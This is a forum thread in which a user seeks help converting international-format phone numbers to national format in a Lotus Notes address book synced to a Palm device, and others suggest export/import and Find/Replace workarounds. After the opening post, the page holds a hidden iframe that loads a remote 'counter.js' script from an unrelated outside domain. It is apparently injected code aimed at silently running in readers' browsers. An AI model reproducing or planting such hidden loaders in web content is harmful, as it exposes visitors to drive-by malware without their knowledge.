+ Reply to Thread

International prefix

My address book has numbers listed in international format (e.g. +6444741234). I was on a Vodafone (GSM) network that liked this format.

My Telecom (CDMA) network won't accept national calls with international prefix . How can I fix this?

Help.

Bill

<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I think I've found out a little more about my own problem. Telecom do not accept the international prefix for national dialling. This is a massive pain in the rear.

I'm syncing to Lotus Notes, and the addressbook won't even let me do a find and replace. Exporting and editing is fine, but have you ever tried to Import into Notes - its like pulling teeth.

Guess I'm stuck with manual dialling until I've been through the whole address book. What a drag.

Bill

That's a bummer Bill.

I messed with my LN address book a bit and I am able to "Find" and I could also bring up the search bar (View, Search bar) to run partial phone numbers searches, However I couldn't perfrom a mass replace at all.

Maybe you could export with the "lotus 123" setting and then bring that up in Excel, make the changes and then do a "save as" in Excel to save it back to "(1-2-3)" format and then import that back into lotus notes -- might be easier than exporting/importing with structured text.

BTW -- Nice Avatar Would you mind terribly if I asked you not to "borrow" mine as it may confuse my buddies and other viewers. PM me if you have an idea for your own design and would like help making one. Thanks
    iPhone therefore iAm.

Yeah, Notes does not make this easy. In order to use the Find and Replace function (vs. just Find), you have to be inside of an addressbook entry. So there are two ways you could do this process: 1. Manually. Totally tedious, but using keyboard shortcuts might make it just bearable. Enter to go into a record, Alt-E, F for Find/Replace, at least you'd only have to enter the data to replace once, All, OK, esc, Enter to save, down to next entry, repeat. Yuk! 2. Write an agent, to search out values in your addressbook and change them. Unfortunately, it looks like the Simple Actions can't make this precise a change to a field values, so you'd have to use a formula to do the replacing. It's been a while since I've written formula agents, so I couldn't tell you exactly how to do it. Perhaps you have a local Notes guru who owes you a favor?

Overall, exporting and re-importing might be your best bet. The only thing I'd worry about here is that I've sometimes seen cases where the conduit doesn't quite "get" this process, and makes duplicates of everything. I've seen some de-duping tools out there, although I haven't tried them yet, so this might be something to test first, and make sure you are ready to deal with if it happens. Which syncing tool are you using-- EasySync? Intellisync?

Notes Addressbook

Thanks for your help guys - as always it comes back to Notes. If they just made it a little more user friendly, oh what an application it would be.

I'm a Notes developer, but can't be bothered creating that agent at the moment - I too tried the simple approach, but I don't think it will let you "remove" the +64 and replace with 0. Either the dreaded @Commands, or the not so much better LotusScript.

Sorry about the plagiarism Steve - as they say "immitation is the sincerist form of flattery". Great avatar though. I've taken this as my queue to promote New Zealand's flag . Please don't take offense.

Whilst I love the 7135, I fear that I might have to love it and leave it. You see I develop applications for the Palm for my insurance company, and I need the latest model to continue testing - which means OS5. Looks like I'm heading for the Clie PEG-TG50 with Bluetooth (and a memory stick included).

However this doesn't mean I can't have fun with the 7135 for the 8 weeks I have it.

Thanks guys,

Bill

Boy Steve, you should get the award for the most coveted avatar! I think I've seen it "borrowed" at least twice. :angel

Originally posted by KLiuLess
    Boy Steve, you should get the award for the most coveted avatar! I think I've seen it "borrowed" at least twice. :angel

I put a lot of work into it as I had some time on my hands while I was waiting for my SMARTer-than-anything-else-and-smaller-than-carring-muliple-devices-..PHONE.

No offence taken bmoses. Thanks for your understanding. Mine is already plastered all over the place as it is!
    iPhone therefore iAm.